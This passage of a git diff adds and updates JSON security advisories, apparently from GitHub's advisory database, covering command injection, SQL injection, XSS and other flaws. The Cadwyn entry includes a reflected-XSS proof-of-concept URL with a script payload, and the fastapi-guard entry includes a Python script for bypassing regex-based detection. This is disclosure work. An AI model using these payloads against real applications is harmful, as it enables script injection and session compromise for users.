b/advisories/unreviewed/2025/07/GHSA-3gv5-8xmr-r4c8/GHSA-3gv5-8xmr-r4c8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gv5-8xmr-r4c8", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41673" + ], + "details": "A high privileged remote attacker can execute arbitrary system commands via POST requests in the send_sms action due to improper neutralization of special elements used in an OS command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41673" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4v7v-9hh5-q3vp/GHSA-4v7v-9hh5-q3vp.json b/advisories/unreviewed/2025/07/GHSA-4v7v-9hh5-q3vp/GHSA-4v7v-9hh5-q3vp.json new file mode 100644 index 0000000000000..d7d37ec87e064 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4v7v-9hh5-q3vp/GHSA-4v7v-9hh5-q3vp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v7v-9hh5-q3vp", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41675" + ], + "details": "A high privileged remote attacker can execute arbitrary system commands via GET requests in the cloud server communication script due to improper neutralization of special elements used in an OS command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41675" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-83ch-3237-6753/GHSA-83ch-3237-6753.json b/advisories/unreviewed/2025/07/GHSA-83ch-3237-6753/GHSA-83ch-3237-6753.json new file mode 100644 index 0000000000000..857317e060889 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-83ch-3237-6753/GHSA-83ch-3237-6753.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83ch-3237-6753", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-5681" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Turtek Software Eyotek allows Exploitation of Trusted Identifiers.This issue affects Eyotek: before 23.06.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5681" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0163" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T11:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-933j-wmw8-7chh/GHSA-933j-wmw8-7chh.json b/advisories/unreviewed/2025/07/GHSA-933j-wmw8-7chh/GHSA-933j-wmw8-7chh.json new file mode 100644 index 0000000000000..c398ce46c2816 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-933j-wmw8-7chh/GHSA-933j-wmw8-7chh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-933j-wmw8-7chh", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41678" + ], + "details": "A high privileged remote attacker can alter the configuration database via POST requests due to improper neutralization of special elements used in a SQL statement.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41678" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-964f-6xc7-ggjr/GHSA-964f-6xc7-ggjr.json b/advisories/unreviewed/2025/07/GHSA-964f-6xc7-ggjr/GHSA-964f-6xc7-ggjr.json new file mode 100644 index 0000000000000..4d216d6096d65 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-964f-6xc7-ggjr/GHSA-964f-6xc7-ggjr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-964f-6xc7-ggjr", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-41459" + ], + "details": "Insufficient protection against brute-force and runtime manipulation in the local authentication component in Two App Studio Journey 5.5.6 on iOS allows local attackers to bypass biometric and PIN-based access control via repeated PIN attempts or dynamic code injection.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41459" + }, + { + "type": "WEB", + "url": "https://www.cirosec.de/sa/sa-2025-006" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T11:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9c9x-54g4-9pfx/GHSA-9c9x-54g4-9pfx.json b/advisories/unreviewed/2025/07/GHSA-9c9x-54g4-9pfx/GHSA-9c9x-54g4-9pfx.json new file mode 100644 index 0000000000000..002867e688bdc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9c9x-54g4-9pfx/GHSA-9c9x-54g4-9pfx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c9x-54g4-9pfx", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41679" + ], + "details": "An unauthenticated remote attacker could exploit a buffer overflow vulnerability in the device causing a denial of service that affects only the network initializing wizard (Conftool) service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41679" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9hj4-m545-52ww/GHSA-9hj4-m545-52ww.json b/advisories/unreviewed/2025/07/GHSA-9hj4-m545-52ww/GHSA-9hj4-m545-52ww.json new file mode 100644 index 0000000000000..24a07eead9fdb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9hj4-m545-52ww/GHSA-9hj4-m545-52ww.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hj4-m545-52ww", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-2301" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Akbim Software Online Exam Registration allows Exploitation of Trusted Identifiers.This issue affects Online Exam Registration: before 14.03.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2301" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0164" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T12:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fvh4-7pmw-84hm/GHSA-fvh4-7pmw-84hm.json b/advisories/unreviewed/2025/07/GHSA-fvh4-7pmw-84hm/GHSA-fvh4-7pmw-84hm.json new file mode 100644 index 0000000000000..88c006cecc2f7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fvh4-7pmw-84hm/GHSA-fvh4-7pmw-84hm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvh4-7pmw-84hm", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41677" + ], + "details": "A high privileged remote attacker can exhaust critical system resources by sending specifically crafted POST requests to the send-mail action in fast succession.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41677" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jq2c-m8gg-mqcm/GHSA-jq2c-m8gg-mqcm.json b/advisories/unreviewed/2025/07/GHSA-jq2c-m8gg-mqcm/GHSA-jq2c-m8gg-mqcm.json new file mode 100644 index 0000000000000..376c7bd0152d8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jq2c-m8gg-mqcm/GHSA-jq2c-m8gg-mqcm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jq2c-m8gg-mqcm", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-49656" + ], + "details": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49656" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m9qp-cg35-56g5/GHSA-m9qp-cg35-56g5.json b/advisories/unreviewed/2025/07/GHSA-m9qp-cg35-56g5/GHSA-m9qp-cg35-56g5.json new file mode 100644 index 0000000000000..3e7e8ec90f63c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m9qp-cg35-56g5/GHSA-m9qp-cg35-56g5.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9qp-cg35-56g5", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-7924" + ], + "details": "A vulnerability classified as problematic was found in PHPGurukul Online Banquet Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7924" + }, + { + "type": "WEB", + "url": "https://github.com/LagonGit/ReportCVE/issues/1" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1vrvOnw662FZ7CIfhr5EnXPLRqwTRkJqA/view" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317053" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317053" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618882" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T11:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q967-6vc6-rqr5/GHSA-q967-6vc6-rqr5.json b/advisories/unreviewed/2025/07/GHSA-q967-6vc6-rqr5/GHSA-q967-6vc6-rqr5.json new file mode 100644 index 0000000000000..433ddc65f3e0b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q967-6vc6-rqr5/GHSA-q967-6vc6-rqr5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q967-6vc6-rqr5", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41676" + ], + "details": "A high privileged remote attacker can exhaust critical system resources by sending specifically crafted POST requests to the send-sms action in fast succession.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41676" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vx6m-h78h-xxcf/GHSA-vx6m-h78h-xxcf.json b/advisories/unreviewed/2025/07/GHSA-vx6m-h78h-xxcf/GHSA-vx6m-h78h-xxcf.json new file mode 100644 index 0000000000000..5eadb81005355 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vx6m-h78h-xxcf/GHSA-vx6m-h78h-xxcf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vx6m-h78h-xxcf", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-41458" + ], + "details": "Unencrypted storage in the database in Two App Studio Journey v5.5.9 for iOS allows local attackers to extract sensitive data via direct access to the app’s filesystem.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41458" + }, + { + "type": "WEB", + "url": "https://www.cirosec.de/sa/sa-2025-005" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-312" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T11:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json b/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json index e09bdd263b894..14ec4e3e6da6a 100644 --- a/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json +++ b/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w362-42cv-6j7v", - "modified": "2025-07-21T09:33:26Z", + "modified": "2025-07-21T12:30:33Z", "published": "2025-07-21T09:33:26Z", "aliases": [ "CVE-2025-4569" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://www.asus.com/content/asus-product-security-advisory" + }, + { + "type": "WEB", + "url": "https://www.asus.com/content/security-advisory" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-wh93-h96v-jpg3/GHSA-wh93-h96v-jpg3.json b/advisories/unreviewed/2025/07/GHSA-wh93-h96v-jpg3/GHSA-wh93-h96v-jpg3.json new file mode 100644 index 0000000000000..ab5cbdf7fc56e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wh93-h96v-jpg3/GHSA-wh93-h96v-jpg3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh93-h96v-jpg3", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41674" + ], + "details": "A high privileged remote attacker can execute arbitrary system commands via POST requests in the diagnostic action due to improper neutralization of special elements used in an OS command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41674" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json b/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json index 11b92b280e4ba..95eeac34d406b 100644 --- a/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json +++ b/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x75p-289f-65mx", - "modified": "2025-07-21T09:33:26Z", + "modified": "2025-07-21T12:30:33Z", "published": "2025-07-21T09:33:26Z", "aliases": [ "CVE-2025-4570" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://www.asus.com/content/asus-product-security-advisory" + }, + { + "type": "WEB", + "url": "https://www.asus.com/content/security-advisory" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-xg9p-p463-3qjp/GHSA-xg9p-p463-3qjp.json b/advisories/unreviewed/2025/07/GHSA-xg9p-p463-3qjp/GHSA-xg9p-p463-3qjp.json new file mode 100644 index 0000000000000..3acc5316f038e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xg9p-p463-3qjp/GHSA-xg9p-p463-3qjp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg9p-p463-3qjp", + "modified": "2025-07-21T12:30:34Z", + "published": "2025-07-21T12:30:34Z", + "aliases": [ + "CVE-2025-50151" + ], + "details": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50151" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:25Z" + } +} \ No newline at end of file From 8e25fe1f344be68cf74fc709a54aaa2614851766 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 12:43:55 +0000 Subject: [PATCH 047/323] Publish Advisories GHSA-q53q-gxq9-mgrj GHSA-9768-hprv-crj5 --- .../2025/05/GHSA-q53q-gxq9-mgrj/GHSA-q53q-gxq9-mgrj.json | 6 +++++- .../2025/07/GHSA-9768-hprv-crj5/GHSA-9768-hprv-crj5.json | 3 ++- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/05/GHSA-q53q-gxq9-mgrj/GHSA-q53q-gxq9-mgrj.json b/advisories/github-reviewed/2025/05/GHSA-q53q-gxq9-mgrj/GHSA-q53q-gxq9-mgrj.json index ac22b44b62a2f..ba12dda193430 100644 --- a/advisories/github-reviewed/2025/05/GHSA-q53q-gxq9-mgrj/GHSA-q53q-gxq9-mgrj.json +++ b/advisories/github-reviewed/2025/05/GHSA-q53q-gxq9-mgrj/GHSA-q53q-gxq9-mgrj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q53q-gxq9-mgrj", - "modified": "2025-05-28T19:46:07Z", + "modified": "2025-07-21T12:42:18Z", "published": "2025-05-22T09:33:21Z", "aliases": [ "CVE-2025-4123" @@ -48,6 +48,10 @@ "type": "PACKAGE", "url": "https://github.com/grafana/grafana" }, + { + "type": "WEB", + "url": "https://grafana.com/blog/2025/05/23/grafana-security-release-medium-and-high-severity-security-fixes-for-cve-2025-4123-and-cve-2025-3580" + }, { "type": "WEB", "url": "https://grafana.com/security/security-advisories/cve-2025-4123" diff --git a/advisories/github-reviewed/2025/07/GHSA-9768-hprv-crj5/GHSA-9768-hprv-crj5.json b/advisories/github-reviewed/2025/07/GHSA-9768-hprv-crj5/GHSA-9768-hprv-crj5.json index c8ef61a9c12c1..6077307ca94d9 100644 --- a/advisories/github-reviewed/2025/07/GHSA-9768-hprv-crj5/GHSA-9768-hprv-crj5.json +++ b/advisories/github-reviewed/2025/07/GHSA-9768-hprv-crj5/GHSA-9768-hprv-crj5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9768-hprv-crj5", - "modified": "2025-07-09T20:28:31Z", + "modified": "2025-07-21T12:42:27Z", "published": "2025-07-09T18:30:44Z", "aliases": [ "CVE-2025-53650" @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-522", "CWE-779" ], "severity": "MODERATE", From a49bc72dffb8153d7abe7d72dd028779d2b3beb0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:07:46 +0000 Subject: [PATCH 048/323] Publish GHSA-3wqh-h42r-x8fq --- .../2020/09/GHSA-3wqh-h42r-x8fq/GHSA-3wqh-h42r-x8fq.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2020/09/GHSA-3wqh-h42r-x8fq/GHSA-3wqh-h42r-x8fq.json b/advisories/github-reviewed/2020/09/GHSA-3wqh-h42r-x8fq/GHSA-3wqh-h42r-x8fq.json index 4743cdfc6e243..c31af09ee5b12 100644 --- a/advisories/github-reviewed/2020/09/GHSA-3wqh-h42r-x8fq/GHSA-3wqh-h42r-x8fq.json +++ b/advisories/github-reviewed/2020/09/GHSA-3wqh-h42r-x8fq/GHSA-3wqh-h42r-x8fq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3wqh-h42r-x8fq", - "modified": "2020-08-31T19:00:42Z", + "modified": "2025-07-21T13:06:11Z", "published": "2020-09-03T15:46:22Z", "aliases": [], "summary": "Denial of Service in @hapi/subtext", @@ -18,7 +18,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.1.0" + "introduced": "6.1.0" }, { "fixed": "6.1.3" From 4b9a2f9375c523c92223f849e02abab4c0bb8f95 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 14:10:13 +0000 Subject: [PATCH 049/323] Publish GHSA-2gxp-6r36-m97r --- .../GHSA-2gxp-6r36-m97r.json | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json diff --git a/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json b/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json new file mode 100644 index 0000000000000..9c395f5742f5c --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gxp-6r36-m97r", + "modified": "2025-07-21T14:08:40Z", + "published": "2025-07-21T14:08:40Z", + "aliases": [ + "CVE-2025-53528" + ], + "summary": "Cadwyn vulnerable to XSS on the docs page", + "details": "### Summary\nThe `version` parameter of the `/docs` endpoint is vulnerable to a Reflected XSS (Cross-Site Scripting) attack.\n\n### PoC\n1. Setup a minimal app following the quickstart guide: https://docs.cadwyn.dev/quickstart/setup/\n2. Click on the following PoC link: http://localhost:8000/docs?version=%27%2balert(document.domain)%2b%27\n\n### Impact\nRefer to this [security advisory](https://github.com/Visionatrix/Visionatrix/security/advisories/GHSA-w36r-9jvx-q48v) for an example of the impact of a similar vulnerability that shares the same root cause.\n\nThis XSS would notably allow an attacker to execute JavaScript code on a user's session for any application based on `Cadwyn` via a one-click attack.\n\nA CVSS for the average case may be: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L\n\n### Details\nThe vulnerable code snippet can be found in the 2 functions `swagger_dashboard` and `redoc_dashboard`: https://github.com/zmievsa/cadwyn/blob/main/cadwyn/applications.py#L387-L413\n\nThe implementation uses the [get_swagger_ui_html](https://fastapi.tiangolo.com/reference/openapi/docs/?h=get_swagger_ui_html#fastapi.openapi.docs.get_swagger_ui_html) function from FastAPI. This function does not encode or sanitize its arguments before using them to generate the HTML for the swagger documentation page and is not intended to be used with user-controlled arguments.\n\n```python\n async def swagger_dashboard(self, req: Request) -> Response:\n version = req.query_params.get(\"version\")\n\n if version:\n root_path = self._extract_root_path(req)\n openapi_url = root_path + f\"{self.openapi_url}?version={version}\"\n oauth2_redirect_url = self.swagger_ui_oauth2_redirect_url\n if oauth2_redirect_url:\n oauth2_redirect_url = root_path + oauth2_redirect_url\n return get_swagger_ui_html(\n openapi_url=openapi_url,\n title=f\"{self.title} - Swagger UI\",\n oauth2_redirect_url=oauth2_redirect_url,\n init_oauth=self.swagger_ui_init_oauth,\n swagger_ui_parameters=self.swagger_ui_parameters,\n )\n return self._render_docs_dashboard(req, cast(\"str\", self.docs_url))\n```\n\nIn this case, the `openapi_url` variable contains the version which comes from a user supplied query string without encoding or sanitisation. The user controlled injection ends up inside of a string in a `\"\n}\nresponse = requests.post(url=URL, json=obvious_payload)\nprint(f\"[+] response of first request: {response.text}\")\n\nbypassed_payload = {\n \"suspicious\" : f''\n}\n\nresponse = requests.post(url=URL, json=bypassed_payload)\nprint(f\"[+] response of second request: {response.text}\")\n\n```\n\"image\"\n\n### Impact\n\nDue to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi-guard" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.1" + }, + { + "fixed": "3.0.2" + } + ] + } + ], + "versions": [ + "3.0.1" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-rrf6-pxg8-684g" + }, + { + "type": "WEB", + "url": "https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a" + }, + { + "type": "WEB", + "url": "https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rennf93/fastapi-guard" + } + ], + "database_specific": { + "cwe_ids": [ + 